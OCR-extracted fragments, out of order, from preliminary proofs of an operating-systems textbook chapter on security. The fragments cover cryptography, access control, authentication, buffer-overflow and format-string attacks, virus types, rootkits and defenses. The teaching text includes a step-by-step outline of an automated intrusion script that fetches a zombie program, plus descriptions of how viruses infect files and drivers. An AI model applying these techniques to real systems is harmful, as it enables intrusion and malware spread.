139. ifferent virtual address depending which infected program is running but all this means is that Virgil has to make sure his virus is position independent using relative instead of absolute addresses That is not hard for an experienced pro grammer to do and some compilers can do it upon request Complex executable program formats such as exe files on Windows and nearly all modern UNIX binary formats allow a program to have multiple text and data segments with the loader assembling them in memory and doing relocation on the fly In some systems Windows for example all segments sections are multiples of 512 bytes If a segment is not full the linker fills it out with Os A PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction SEC 9 7 storage in a retrieval system orMlanbrWSAIBAn any form or by any means electronic mechanical photocopying recording or likewise virus that understands this can try to hide itself in the holes If it fits entirely as in Fig 9 28 d the file size remains the same as that of the uninfected file clearly a plus since a hidden virus is a happy virus Viruses that use this principle are called cavity viruses Of course if the loa
140. ikewise 26 Explain how the UNIX password mechanism different from encryption 27 Suppose a password file of a system is available to a cracker How much extra time does the cracker need to crack all passwords if the system is using Morris Thompson protection scheme with n bit salt versus if the system is not using this scheme 28 Name three characteristics that a good biometric indicator must have for it to be useful as a login authenticator 29 A computer science department has a large collection of UNIX machines on its local network Users on any machine can issue a command of the form rexec machine4 who and have the command executed on machine4 without having the user log in on the remote machine This feature is implemented by having the user s kernel send the command and his UID to the remote machine Is this scheme secure if the kernels are all trustworthy What if some of the machines are students personal computers with no protection 30 What property do the implementation of passwords in UNIX have in common with Lamport s scheme for logging in over an insecure network 31 Lamport s one time password scheme uses the passwords in reverse order Would it not be simpler to use f s the first time f f s the second time and so on 32 Is there any feasible way to use the MMU hardware to prevent the kind of overflow attack shown in Fig 9 24 Explain why or why not 33 Name aC compiler feature that could elim
141. ikewise This call to printf is allowed because printf has a variable number of arguments of which the first must be a format string But a string not containing any format ting information such as s is legal so although the second version is not good programming practice it is allowed and it will work Best of all it saves typing five characters clearly a big win Six months later some other programmer is instructed to modify the code to first ask the user for his name then greet the user by name He changes the code a little bit like this char s 100 g 100 Hello declare s and g initialize g gets s read a string from the keyboard into s strcat g s concatenate s onto the end of g printf g print g Now it reads a string into the variable s and concatenates it to the initialized string g to build the output message in g It still works So far so good except for the use of gets which is subject to buffer overflow attacks but it is easy to use and still popular However a knowledgeable user who saw this code would quickly realize that the input accepted from the keyboard is not a just a string it is a format string and as such all the format specifications allowed by printf will work While most of the formatting indicators such as s for printing strings and d for print ing decimal integers there are also a few exotic ones In particular n does not prin
142. ile FJ It does not matter if there is one such process or 100 of them It is the owner not the process ID that matters PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 16 storage in a retrieval system or HAsMREiBY in any form or by any means elecfrddi amp P 9 mechanical photocopying recording or likewise File F2 has three entries in its ACL A B and C can all read the file and in addition B can also write it No other accesses are allowed File F3 is apparently an executable program since B and C can both read and execute it B can also write it This example illustrates the most basic form of protection with ACLs More sophisticated systems are often used in practice To start with we have only shown three rights so far read write and execute There may be additional rights as well Some of these may be generic that is apply to all objects and some may be object specific Examples of generic rights are destroy object and copy object These could hold for any object no matter what type it is Object specific rights might include append message for a mailbox object and sort alphabetically for a directory object So far our ACL entries have been f
143. in a directory to a file checksum in that directory The next time it runs it recomputes all the checksums and sees if they match what is in the file checksum An infected file will show up immediately The trouble is Virgil is not going to take this lying down He can write a virus that removes the checksum file Worse yet he can write a virus that computes the checksum of the infected file and replaces the old entry in the checksum file To protect against this kind of behavior the antivirus program can try to hide the checksum file but that is not likely to work since Virgil can study the antivirus program carefully before writing the virus A better idea is to sign it digitally to PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 90 storage in a retrieval system or HAsMREiBY in any form or by any means elecfrddidP 9 mechanical photocopying recording or likewise make tampering easy to detect Ideally the digital signature should involve use of a smart card with an externally stored key that programs cannot get at Behavioral Checkers A third strategy used by antivirus software is behavioral checking With this approach the antivirus program lives in
144. in the ciphertext is an X in the plaintext etc At first glance this might appear to be a safe system because although the cryptanalyst knows the general system letter for letter substitution he does not know which of the 26 4 x 1076 possible keys is in use Nevertheless given a surprisingly small amount of ciphertext the cipher can be broken easily The basic attack takes advantage of the statistical properties of natural languages In English for example e is the most common letter followed by t o a n i etc The most common two letter combinations called digrams are th in er re etc Using this kind of information breaking the cipher is easy Many cryptographic systems like this one have the property that given the encryption key it is easy to find the decryption key and vice versa Such systems are called secret key cryptography or symmetric key cryptography Although monoalphabetic substitution ciphers are completely worthless other symmetric key algorithms are known and are relatively secure if the keys are long enough For serious security minimally 256 bit keys should be used giving a search space of 256 1210 keys Shorter keys may thwart amateurs but not major governments 9 2 2 Public Key Cryptography Secret key systems are efficient because the amount of computation required to encrypt or decrypt a message is manageable but have a big drawback the sender and receiver must both be in possession of the shar
145. inate a large number of security holes Why is it not more widely implemented 34 Can the Trojan horse attack work in a system protected by capabilities 35 When a file is removed its blocks are generally put back on the free list but they are not erased Do you think it would be a good idea to have the operating system erase each block before releasing it Consider both security and performance factors in your answer and explain the effect of each 36 How can a parasitic virus a ensure that it will be executed before its host program and b pass control back to its host after doing whatever it does 37 Some operating systems require that disk partitions must start at the beginning of a track How does this make life easier for a boot sector virus 38 Change the program of Fig 9 27 so it finds all the C programs instead of all the exe cutable files 39 The virus in Fig 9 32 d is encrypted How can the dedicated scientists at the antivirus lab tell which part of the file is the key so they can decrypt the virus and reverse engineer it What can Virgil do to make their job a lot harder 40 The virus of Fig 9 32 c has both a compressor and a decompressor The decompres sor is needed to expand and run the compressed executable program What is the compressor for PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle Ri
146. ing or likewise 9 3 6 Formal Models of Secure Systems Protection matrices such as that of Fig 9 5 are not static They frequently change as new objects are created old objects are destroyed and owners decide to increase or restrict the set of users for their objects A considerable amount of attention has been paid to modeling protection systems in which the protection matrix is constantly changing We will now touch briefly upon some of this work Decades ago Harrison et al 1976 identified six primitive operations on the protection matrix that can be used as a base to model any protection system These primitive operations are create object delete object create domain delete domain insert right and remove right The two latter primitives insert and remove rights from specific matrix elements such as granting domain 1 permis sion to read File6 These six primitives can be combined into protection commands It is these protection commands that user programs can execute to change the matrix They may not execute the primitives directly For example the system might have a command to create a new file which would test to see if the file already existed and if not create a new object and give the owner all rights to it There might also be a command to allow the owner to grant permission to read the file to everyone in the system in effect inserting the read right in the new file s entry in every domain At any instant
147. ingly common For example if a computer is an Internet server sending a flood of requests to it may cripple it by eating up all of its CPU time just examining and discarding incoming requests If it takes say 100 usec to process an incoming request to read a Web page then anyone who manages to send 10 000 requests sec can wipe it out Rea sonable models and technology for dealing with attacks on confidentiality and integrity are available foiling these denial of services attacks is much harder Finally a new threat has arisen in recent years Outsiders can sometimes take command of people s home computers using viruses and other means and turn them into zombies willing to do the outsider s bidding at a moment s notice Often zombies are used to send spam so that the mastermind behind the spam attack cannot be traced In a certain sense another threat also exists but it is more of a threat to society than to an individual users There are folks out there who bear a grudge against some particular country or ethnic group or who are just angry at the world in general and who want to destroy as much infrastructure as they can without too much regard to the nature of the damage or who the specific victims are Usually such people feel that attacking their enemies computers is a good thing but the attacks themselves may not be well focused Another aspect of the security problem is privacy protecting individuals from misuse of informatio
148. inicomputers Nearly all of these machines were isolated not connected to any networks As a conse quence security was almost entirely focused on how to keep the users out of each others hair If Tracy and Marcia were both registered users of the same computer the trick was to make sure that neither one could read or tamper with the other one s files yet allow them to share those files they wanted shared Elaborate models and mechanisms were developed to make sure no user could get access rights he or she was not entitled to Sometimes the models and mechanisms involved classes of users rather than just individuals For example on a military computer data had to be markable as top secret secret confidential or public and corporals had to be prevented from snooping in generals directories no matter who the corporal was and who the general was All these themes were thoroughly investigated reported on and implemented over a period of decades An unspoken assumption was that once a model was chosen and an imple mentation made the software was basically correct and would enforce whatever the rules were The models and software were usually pretty simple and that assumption usually held Thus if theoretically Tracy was not permitted to look at a certain one of Marcia s files in practice she really could not do it With the rise of the personal computer and the Internet and the demise of the shared mainframe and minicomputer the situ
149. is on how to subvert the operating system The many ways one can exploit software bugs to attack Websites and data bases are not covered here There are several ways bugs can be exploited One straightforward way is for the attacker to start up a script that does the following 1 Run an automated port scan to find machines that accept telnet con nections Try to log in by guessing login name and password combinations Once in run the flawed program with input that triggers the bug If the buggy program is SETUID root create a SETUID root shell Oh aR sb Fetch and start a zombie program that listens to an IP port for com mands 6 Arrange that the zombie program is always started when the system reboots PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 50 storage in a retrieval system or HAsMREiBY in any form or by any means elecfrddi amp P 9 mechanical photocopying recording or likewise The script may run for a long time but there is a good chance it will eventually succeed By making sure the zombie program is started whenever the computer is rebooted the attacker has made sure once a zombie always a zombie Another common scenario is to
150. ist For every hit the login name and unencrypted password are now known A simple shell script can automate this process so it can be carried out in a fraction of a second A typical run of the script will yield dozens of passwords Recognizing the possibility of this attack Morris and Thompson described a technique that renders the attack almost useless Their idea is to associate an n bit random number called the salt with each password The random number is changed whenever the password is changed The random number is stored in the password file in unencrypted form so that everyone can read it Instead of just storing the encrypted password in the password file the password and the random number are first concatenated and then encrypted together This encrypted result is stored in the password file as shown in Fig 9 19 for a password file with five users Bobbie Tony Laura Mark and Deborah Each user has one line in the file with three entries separated by commas login name salt and encrypted password salt The notation e Dog 4238 represents the result of concatenating Bobbie s password Dog with her randomly assigned salt 4238 and running it through the encryption function e It is the result of that encryption that is stored as the third field of Bobbie s entry Bobbie 4238 e Dog 4238 Tony 2918 e 6 TaeFF 2918 Laura 6902 e Shakespeare 6902 Mark 1694 e XaB Bwcz 1694 Deborah 1092 e LordByron 1092
151. ites the executable program with itself These are called overwriting viruses The infection logic of such a virus is given in Fig 9 27 The main program of this virus would first copy its binary program into an array by opening argv O and reading it in for safe keeping Then it would traverse the entire file system starting at the root directory by changing to the root directory and calling search with the root directory as parameter The recursive procedure search processes a directory by opening it then read ing the entries one at a time using readdir until a NULL is returned indicating that there are no more entries If the entry is a directory it is processed by changing to it and then calling search recursively if it is an executable file it is infected by calling infect with the name of the file to infect as parameter Files starting with are skipped to avoid problems with the and directories Also symbolic links are skipped because the program assumes that it can enter a directory using the chdir system call and then get back to where it was by going to something that holds for hard links but not symbolic links A fancier program could handle symbolic links too The actual infection procedure infect not shown merely has to open the file named in its parameter copy the virus saved in the array over the file and then close the file This virus could be improved in various ways First a test could be inserted i
152. itten permission should be obtained from the publisher prior to any prohibited reproduction 32 storage in a retrieval system or 4HASMREiBY in any form or by any means elecfrddi amp P 9 mechanical photocopying recording or likewise commercial activities All of these things require authenticated login so user authentication is once again an important topic Having determined that authentication is often important the next step is to find a good way to achieve it Most methods of authenticating users when they attempt to log in are based on one of three general principles namely identifying 1 Something the user knows 2 Something the user has 3 Something the user is Sometimes two of these are required for additional security These principles lead to different authentication schemes with different complexities and security pro perties In the following sections we will examine each of these in turn People who want to cause trouble on a particular system have to first log in to that system which means getting past whichever authentication procedure is used In the popular press these people are called hackers However within the com puter world hacker is a term of honor reserved for great programmers While some of these are rogues most are not The press got this one wrong In defer ence to true hackers we will use the term in the original sense and will call people who try to break into computer systems where they do
153. ittle that can be done Introducing a process that causes page faults at random or otherwise spends its time degrading system per formance in order to reduce the bandwidth of the covert channels is not an attrac tive proposition Steganography A slightly different kind of covert channel can be used to pass secret informa tion between processes even though a human or automated censor gets to inspect all messages between the processes and veto the suspicious ones For example consider a company that manually checks all outgoing e mail sent by company employees to make sure they are not leaking secrets to accomplices or competi tors outside the company Is there a way for an employee to smuggle substantial volumes of confidential information right out under the censor s nose It turns out there is AS a case in point consider Fig 9 16 a This photograph taken by the author in Kenya contains three zebras contemplating an acacia tree Fig 9 16 b appears to be the same three zebras and acacia tree but it has an extra added attraction It contains the complete unabridged text of five of Shakespeare s PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 30 sto
154. ivers load some of the vec tors are overwritten but unless the clock driver is loaded first there will be plenty of clock interrupts later that start the virus Loss of the printer interrupt is shown in Fig 9 29 b As soon as the virus sees that one of its interrupt vectors has been overwritten it can overwrite that vector again knowing that it is now safe actu ally some interrupt vectors are overwritten several times during booting but the pattern is deterministic and Virgil knows it by heart Recapture of the printer is shown in Fig 9 29 c When everything is loaded the virus restores all the inter rupt vectors and keeps only the system call trap vector for itself At this point we have a memory resident virus in control of system calls In fact this is how most memory resident viruses get started in life Device Driver Viruses Getting into memory like this is a little like spelunking exploring caves you have to go through contortions and keep worrying about something falling down and landing on your head It would be much simpler if the operating system would just kindly load the virus officially With a little bit of work that goal can be achieved The trick is to infect a device driver leading to a device driver virus In Windows and some UNIX systems device drivers are just executable programs that live on the disk and are loaded at boot time If one of them can be infected the virus will always be officially loaded at b
155. l its forms is widely studied including Trojan horses Agrawal et al 2007 Franz 2007 and Moffie et al 2006 Viruses Bruschi et al 2007 Cheng et al 2007 and Rieback et al 2006 worms Abdelhafez et al 2007 Jiang and Xu 2006 Kienzle and Elder 2003 and Tang and Chen 2007 spyware Egele et al 2007 Felten and Halderman 2006 and Wu et al 2006 and root kits Kruegel et al 2004 Levine et al 2006 Quynh and Takefuji 2007 and Wang and Dasgupta 2007 Since viruses spyware and rootkits all try to hide PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction SEC 9 9 storage in a retrieval RES ARCHsOS6OHRGURIDn or by any means electronic 103 mechanical photocopying recording or likewise there has been work on stealth technology and how they can be detected anyway Carpenter et al 2007 Garfinkel et al 2007 and Lyda and Hamrock 2007 Steaganography itself has also been examined Harmsen and Pearlman 2005 and Kratzer et al 2006 Needless to say there has been much work on defending systems against malware Some of it focusing on antivirus software Henchiri and Japkowicz 2006 Sanok 2005 Stiegler et al 2006 and Uluski e
156. laintext out Encryption Decryption algorithm algorithm B J v v Encryption Decryption Figure 9 2 Relationship between the plaintext and the ciphertext PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 8 storage in a retrieval system or HAsMREiBY in any form or by any means elecfrddi amp P 9 mechanical photocopying recording or likewise 9 2 1 Secret Key Cryptography To make this clearer consider an encryption algorithm in which each letter is replaced by a different letter for example all As are replaced by Qs all Bs are replaced by Ws all Cs are replaced by Es and so on like this plaintext ABCDEFGHIJKLMNOPQRS TUVWXYZ ciphertext QWERTYUIOPASDFGHJKLZXCVBNM This general system is called a monoalphabetic substitution with the key being the 26 letter string corresponding to the full alphabet The encryption key in this example is QWERTYUIOPASDFGHJKLZXCVBNM For the key above the plaintext ATTACK would be transformed into the ciphertext QZZQEA The decryption key tells how to get back from the ciphertext to the plaintext In this example the decryption key is KXVMCNOPHQRSZYIJADLEGWBUFT because an A in the ciphertext is a K in the plaintext a B
157. launch a virus that infects machines all over the Internet and have them exploit the bug after they land on a new machine Basically steps 1 and 2 are replaced above but the other steps still apply Either way the attacker s program will run on the target machine almost always without the owner knowing about it 9 6 1 Buffer Overflow Attacks One rich source of attacks has been due to the fact that virtually all operating systems and most systems programs are written in the C programming language because programmers like it and it can be compiled extremely efficiently Unfortunately no C compiler does array bounds checking Consequently the fol lowing code sequence while not legal is also not checked int i char c 1024 i 12000 c i 0 The result is that some byte of memory 10 976 bytes outside the array c is over written possibly with disastrous consequences No check is performed at run time to prevent this error This property of C leads to attacks of the following kind In Fig 9 24 a we see the main program running with its local variables on the stack At some point it calls a procedure A as shown in Fig 9 24 b The standard calling sequence starts out by pushing the return address which points to the instruction following the call onto the stack It then transfers control to A which decrements the stack pointer to allocate storage for its local variables Suppose that the job of A requires acquiring the
158. ld probably be the i node number Capability lists are themselves objects and may be pointed to from other capability lists thus facilitating sharing of subdomains It is fairly obvious that capability lists must be protected from user tampering Three methods of protecting them are known The first way requires a tagged architecture a hardware design in which each memory word has an extra or tag bit that tells whether the word contains a capability or not The tag bit is not used by arithmetic comparison or similar ordinary instructions and it can be modified only by programs running in kernel mode i e the operating system Tagged architecture machines have been built and can be made to work well Feustal 1972 The IBM AS 400 is a popular example The second way is to keep the C list inside the operating system Capabilities are then referred to by their position in the capability list A process might say Read 1 KB from the file pointed to by capability 2 This form of addressing is similar to using file descriptors in UNIX Hydra Wulf et al 1974 worked this way The third way is to keep the C list in user space but manage the capabilities cryptographically so that users cannot tamper with them This approach is particu larly suited to distributed systems and works as follows When a client process sends a message to a remote server for example a file server to create an object for it the server creates the object and ge
159. le The encryption algorithm uses two n byte arrays A and B The first n bytes are read from the file into A Then A 0 is copied to B i A 1 is copied to B j A 2 is copied to B k etc After all n bytes are copied to the B array that array is written to the output file and n more bytes are read into A This procedure continues until the entire file has been encrypted Note that here encryption is not being done by replacing characters with other ones but by changing their order How many keys have to be tried to exhaustively search the key space Give an advantage of this scheme over a monoalphabetic substitution cipher Secret key cryptography is more efficient than public key cryptography but requires the sender and receiver to agree on a key in advance Suppose that the sender and receiver have never met but there exists a trusted third party that shares a secret key with the sender and also shares a different secret key witht the receiver How can the sender and receiver establish a new shared secret key under these circumstances 5 Give a simple example of a mathematical function that to a first approximation will do as a one way function 6 Suppose that two strangers A and B want to communicate with each other using secret key cryptography but do not share a key Suppose both of them trust a third PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearso
160. lities When a capability to the indirect object is later presented to the system the user will discover that the indirect object is now pointing to a null object In the Amoeba scheme revocation is easy All that needs to be done is change the check field stored with the object In one blow all existing capabilities are invalidated However neither scheme allows selective revocation that is taking back say John s permission but nobody else s This defect is generally recog nized to be a problem with all capability systems Another general problem is making sure the owner of a valid capability does not give a copy to 1000 of his best friends Having the kernel manage capabilities as in Hydra solves this problem but this solution does not work well in a distri buted system such as Amoeba Briefly summarized ACLs and capabilities have somewhat complementary properties Capabilities are very efficient because if a process says Open the file pointed to by capability 3 no checking is needed With ACLs a potentially long search of the ACL may be needed If groups are not supported then grant ing everyone read access to a file requires enumerating all users in the ACL Capabilities also allow a process to be encapsulated easily whereas ACLs do not On the other hand ACLs allow selective revocation of rights which capabilities do not Finally if an object is removed and the capabilities are not or the capabili ties are rem
161. lose to classical malware where the infected machine becomes part of a zombie army waiting for its master to give it marching orders They ran an experiment to see what kinds of Websites contain spyware by visiting 5000 Websites They observed that the major purveyors of spyware are Websites relating to adult entertainment warez online travel and real estate A much larger study was done at the University of Washington Moshchuk et al 2006 In the UW study 18 million URLs were inspected and almost 6 were found to contain spyware Thus it is not surprising that in a study by AOL NCSA that they cite 80 of the home computers inspected were infested by spyware with an average of 93 pieces of spyware per computer The UW study found that the adult celebrity and wallpaper sites had the largest infection rates but they did not examine travel and real estate Potter Stewart was a justice on the U S Supreme Court 1958 1981 He is now most famous for writing a concurring opinion on a case concerning pornography in he which he admitted to being unable to define pornography but added but I know it when I see it PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction
162. me being to locate and wipe out your opponent before he wiped you out The virus antivirus confrontation looks a little like that only the battlefield is the machine of some poor user who does not really want it to happen there Worse yet the virus has an advantage because its writer can find out a lot about the antivirus program by just buying a copy of it Of course once the virus is out there the antivirus team can modify their program forcing Virgil to go buy a new copy Virus Avoidance Every good story needs a moral The moral of this one is Better safe than sorry Avoiding viruses in the first place is a lot easier than trying to track them down once they have infected a computer Below are a few guidelines for individual users but also some things that the industry as a whole can do to reduce the prob lem considerably What can users do to avoid a virus infection First choose an operating PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction SEC 9 8 storage in a retrieval system or lbEYSHINSEDSin any form or by any means electronic i mechanical photocopying recording or likewise system that offers a high degree of security with a strong kernel
163. memory while the computer is running and catches all system calls itself The idea is that it can then monitor all activity and try to catch anything that looks suspicious For example no normal program should attempt to overwrite the boot sector so an attempt to do so is almost cer tainly due to a virus Likewise changing the flash memory is highly suspicious But there are also cases that are less clear cut For example overwriting an executable file is a peculiar thing to do unless you are a compiler If the antivirus software detects such a write and issues a warning hopefully the user knows whether overwriting an executable makes sense in the context of the current work Similarly Word overwriting a doc file with a new document full of macros is not necessarily the work of a virus In Windows programs can detach from their executable file and go memory resident using a special system call Again this might be legitimate but a warning might still be useful Viruses do not have to passively lie around waiting for an antivirus program to kill them like cattle being led off to slaughter They can fight back A particu larly interesting battle can occur if a memory resident virus and a memory resident antivirus meet up on the same computer Years ago there was a game called Core Wars in which two programmers faced off by each dropping a pro gram into an empty address space The programs took turns probing memory with the object of the ga
164. most Web pages were just static HTML files with a few associated images Nowadays increasingly many Web pages contain small programs called applets When a Web page containing applets is downloaded the applets are fetched and executed For example an applet might contain a form to be filled out plus interactive help in filling it out When the form is filled out it could be sent somewhere over the Internet for processing Tax forms customized product order forms and many other kinds of forms could benefit from this approach Another example in which programs are shipped from one machine to another for execution on the destination machine are agents These are programs that are launched by a user to perform some task and then report back For example an agent could be asked to check out some travel Web sites to find the cheapest flight from Amsterdam to San Francisco Upon arriving at each site the agent would run there get the information it needs then move on to the next Web site When it was all done it could come back home and report what it had learned A third example of mobile code is a PostScript file that is to be printed on a PostScript printer A PostScript file is actually a program in the PostScript pro gramming language that is executed inside the printer It normally tells the printer to draw certain curves and then fill them in but it can do anything else it wants to as well Applets agents and PostScript files are just three
165. mputer but this is rarely done However nowadays much security work is being focused on the smart cards which currently have something like a 4 MHz 8 bit CPU 16 KB of ROM 4 KB of ROM 512 bytes of scratch RAM and a 9600 bps communication channel to the reader The cards are getting smarter in time but are constrained in a PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 42 storage in a retrieval system or HASMIRSIBY in any form or by any means elecfrdiAP 9 mechanical photocopying recording or likewise variety of ways including the depth of the chip because it is embedded in the card the width of the chip so it does not break when the user flexes the card and the cost typically 1 to 20 depending on the CPU power memory size and presence or absence of a cryptographic coprocessor Smart cards can be used to hold money as do stored value cards but with much better security and universality The cards can be loaded with money at an ATM machine or at home over the telephone using a special reader supplied by the bank When inserted into a merchant s reader the user can authorize the card to deduct a certain amount of money from the card by
166. n Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction storage in a retrieval system or transmission in any form or by any means electronic mechanical photocopying recording or likewise world Then comes Sec 9 3 which is about the formal models of security and how people can reason about secure access and protection among users who have confidential data but also share data with others So far so good Then reality kicks in The next five major sections are practi cal security problems that occur in daily life But to close on an optimistic note we end the chapter with sections on defenses against these real world pests and a short discussion of ongoing research on computer security and finally a short sum mary Also worth noting is that while this is a book on operating systems operating systems security and network security are so intertwined that it is really impossi ble to separate them For example viruses come in over the network but affect the operating system On the whole we have tended to err on the side of caution and included some material that is germane to the subject but not really an operat ing systems issue 9 1 THE SECURITY ENVIRONMENT Let us start our study of security with some terminology
167. n Education Inc Upper Saddle River New Jersey All rights reserved This publication ip protested by Copyright and written permission should be obtained from the publisher prior to ay ywonibited reproduction CHAP 9 storage in a retrieval system oft is5i Mn any form or by any means electronic mechanical photocopying recording or likewise party C whose public key is well known How can the two strangers establish a new shared secret key under these circumstances 7 As Internet cafes become more widespread people are going to want ways of going to one anywhere in the world and conducting business from them Describe a way to pro duce signed documents from one using a smart card assume that all the computers are equipped with smart card readers Is your scheme secure 8 In a full access control matrix the rows are for domains and the columns are for objects What happens if some object is needed in two domains 9 Suppose that a system has 1000 objects and 100 domains at some time 1 of the objects are accessible some combination or r w and x in all domains 10 are acces sible in two domains and remaining 89 are accessible in only one domain Suppose one unit of space is required to store an access right some combination of r w x object ID or a domain ID How much space is needed to store the full protection matrix protection matrix as ACL and protection matrix as capability list 10 Explain which implementation of
168. n about them This quickly gets into many legal and moral issues Should the government compile dossiers on everyone in order to catch X cheaters where X is welfare or tax depending on your politics Should the police be able to look up anything on anyone in order to stop organized crime Do employers and insurance companies have rights What happens when these PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction SEC 9 1 storage in a retrieVaHdy SEH ORAGHSmESNGATIR INNOENG by any means electronic mechanical photocopying recording or likewise rights conflict with individual rights All of these issues are extremely important but are beyond the scope of this book 9 1 2 Intruders Most people are pretty nice and obey the law so why worry about security Because there are unfortunately a few people around who are not so nice and want to cause trouble possibly for their own commercial gain In the security litera ture people who are nosing around places where they have no business being are called intruders or sometimes adversaries Intruders act in two different ways Passive intruders just want to read files they are not authorized to read A
169. nce is golden Another area in which not quite getting it right has serious security PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction SEC 9 4 storage in a retrieval systeAnL5F H amp GSMHILGISATRANY form or by any means electronic 33 mechanical photocopying recording or likewise implications is illustrated in Fig 9 17 In Fig 9 17 a a successful login is shown with system output in upper case and user input in lower case In Fig 9 17 b a failed attempt by a cracker to log into System A is shown In Fig 9 17 c a failed attempt by a cracker to log into System B is shown LOGIN mitch LOGIN carol LOGIN carol PASSWORD FooBar 7 INVALID LOGIN NAME PASSWORD Idunno SUCCESSFUL LOGIN LOGIN INVALID LOGIN LOGIN a b c Figure 9 17 a A successful login b Login rejected after name is entered c Login rejected after name and password are typed In Fig 9 17 b the system complains as soon as it sees an invalid login name This is a mistake as it allows the cracker to keep trying login names until she finds a valid one In Fig 9 17 c the cracker is always asked for a password and gets no feedback about whether the login name itself is
170. nd stored outside the system where it could not be tampered with Alternatively if no such hashes were made originally they can be computed from the installation CD ROM or DVD now or the files themselves just compared Rootkits in libraries and application programs are harder to hide but if the Operating system has been loaded from an external medium and can be trusted their hashes can also be compared to hashes known to be good and stored on a CD ROM So far the discussion has been about passive rootkits which do not interfere with the detection software There are also active rootkits which search out and destroy the rootkit detection software or at least modify it to always announce NO ROOTKITS FOUND These require more complicated measures but for tunately no active rootkits have appeared in the wild yet There are two schools of thought about what to do after a rootkit has been discovered One school says the system administrator should behave like a sur geon treating a cancer cut it out very carefully The other says trying to remove the rootkit is too dangerous There may be pieces still hidden away In this view the only solution is to revert to the last complete backup known to be clean If no clean backup is available a fresh install from the original CD ROM DVD is required The Sony Rootkit In 2005 Sony BMG released a number of audio CDs containing a rootkit It was discovered by Mark Russinovich cofounder of th
171. ndows like a hot potato and buy the new system immediately The second issue is more subtle The only way to build a secure system is to keep it simple Features are the enemy of security System designers believe rightly or wrongly that what users want is more features More features mean more complexity more code more bugs and more security errors Here are two simple examples The first e mail systems sent messages as ASCII text They were completely secure There is nothing an incoming ASCII message can do to damage a computer system Then people got the idea to ex pand e mail to include other types of documents for example Word files which can contain programs in macros Reading such a document means running some body else s program on your computer No matter how much sandboxing is used running a foreign program on your computer is inherently more dangerous than looking at ASCII text Did users demand the ability to change e mail from passive documents to active programs Probably not but systems designers thought it would be a nifty idea without worrying too much about the security implications The second example is the same thing for Web pages When the Web con sisted of passive HTML pages it did not pose a major security problem Now that many Web pages contain programs applets that the user has to run to view the content one security leak after another pops up As soon as one is fixed another one takes its place When the
172. ne but there are other environments where much tighter security is required such as the military cor porate patent departments and hospitals In the latter environments the organiza tion has stated rules about who can see what and these may not be modified by individual soldiers lawyers or doctors at least not without getting special permis sion from the boss These environments need mandatory access controls to ensure that the stated security policies are enforced by the system in addition to the standard discretionary access controls What these mandatory access controls do is regulate the flow of information to make sure that it does not leak out in a way it is not supposed to The Bell La Padula Model The most widely used multilevel security model is the Bell La Padula model so we will start there Bell and La Padula 1973 This model was designed for handling military security but it is also applicable to other organizations In the military world documents objects can have a security level such as unclassi fied confidential secret and top secret People are also assigned these levels depending on which documents they are allowed to see A general might be allowed to see all documents whereas a lieutenant might be restricted to PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved T
